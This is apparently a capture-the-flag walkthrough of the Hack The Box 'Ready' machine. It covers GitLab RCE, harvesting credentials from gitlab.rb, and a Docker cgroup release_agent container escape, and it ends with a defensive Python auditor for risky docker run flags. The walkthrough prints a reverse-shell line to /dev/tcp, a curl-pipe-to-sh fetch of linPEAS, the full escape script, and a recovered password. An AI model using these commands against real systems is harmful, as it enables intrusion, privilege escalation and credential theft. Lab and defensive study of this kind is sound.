Machine Info

1. Enumeration:

  • Nmap:
  1. Web Enumeration:
  • PORT 5080: Got a GitLab login form

Let's sign up:

And we're in:

Checking /help:

  • It's GitLab version 11.4.7

Searching for exploits:

  • Got a public one from Exploit-DB

  • Let's download and edit the exploit:

As I remember, it didn't work properly (there are some newer versions of this exploit on Exploit-DB now), and I used another exploit from GitHub back then.

  • GitHub exploit:
    • Download and edit:

  • python3 gitlab_rce.py http://10.10.10.220:5080 10.10.16.15

Open a netcat listener first, then run it and we get a session:

We are in as git.

Got the user flag (user dude):

Privilege Escalation:

  • Let's transfer our linPEAS script:

    • $ sudo python -m SimpleHTTPServer 80 » In the folder where linPEAS is

    • $ curl 10.10.16.15/linPEAS.sh | sh » On the target machine

It roams the target machine looking for anything interesting for privilege escalation. I'll show only the interesting findings:

Possible private SSH keys were found!
/var/opt/gitlab/gitlab-rails/etc/secrets.yml

This gitlab.rb looks interesting:

Let's check the important paths manually:

Tons of tokens and private keys.

Let's check gitlab.rb:

Tons of configuration.

  • Let's just grep for any passwords:
    • cat gitlab.rb | grep -i password

And here we get the same password the script found again » wW59U!ZKMbG9+*#h

This gives us the GitLab root user, not root on the Ready box itself.

Rooting:

  • Let's switch to the GitLab root user

  • Searching for a Docker privileged Linux breakout » got this:

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# For a normal PoC ==================
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#===================================
# Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
chmod a+x /cmd
#===================================

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output

Let's make a file and put this script into it:

  • Don't forget to put your own IP > mine is 10.10.16.15:

Let's transfer it to the target machine:

  • Change its mode to executable and start our netcat listener first on port 9000, the port already specified in the script:

And here we go > finally got root on the Ready machine:
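From the defending side, the escape above only works because the container was started with CAP_SYS_ADMIN (to mount cgroupfs and write release_agent) and with the AppArmor profile that would otherwise block that mount switched off. The following is an added example, not part of the original write-up: a small Python audit of `docker run` command lines (for example pulled from shell history or a CI log) that flags exactly those options; the sample command lines are constructed.

```python
import shlex

# Capabilities that let a process mount cgroupfs and set release_agent,
# which is what the release_agent escape above relies on.
RISKY_CAPS = {"SYS_ADMIN", "ALL"}
# Security options that switch off the confinement that would block the mount.
UNCONFINED = {"apparmor=unconfined", "seccomp=unconfined"}


def _long_options(argv):
    """Yield (option, value) pairs for both `--opt value` and `--opt=value` forms."""
    i = 0
    while i < len(argv):
        tok = argv[i]
        if not tok.startswith("--"):
            i += 1
            continue
        if "=" in tok:
            opt, val = tok.split("=", 1)
            i += 1
        elif i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            opt, val = tok, argv[i + 1]
            i += 2
        else:
            opt, val = tok, ""
            i += 1
        yield opt, val


def audit_docker_run(cmdline):
    """Return human-readable findings for one `docker run` command line."""
    argv = shlex.split(cmdline)
    if len(argv) < 2 or argv[1] != "run":
        return []
    findings = []
    for opt, val in _long_options(argv[2:]):
        if opt == "--privileged":
            findings.append("privileged: all capabilities, no LSM/seccomp confinement")
        elif opt == "--cap-add" and val.upper().removeprefix("CAP_") in RISKY_CAPS:
            findings.append(f"cap-add {val}: can mount cgroupfs and set release_agent")
        elif opt == "--security-opt" and val.lower() in UNCONFINED:
            findings.append(f"security-opt {val}: confinement that blocks the mount is off")
    return findings


def release_agent_risk(cmdline):
    """True when the container receives the capability the release_agent escape needs."""
    return any(f.startswith(("privileged", "cap-add")) for f in audit_docker_run(cmdline))


if __name__ == "__main__":
    # Constructed sample: the exact launch line used in the breakout above.
    sample = "docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash"
    for finding in audit_docker_run(sample):
        print(finding)
```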

Hope you enjoyed this writeup ..

If so kindly give me respect Wh1rlw1nd-HTB ..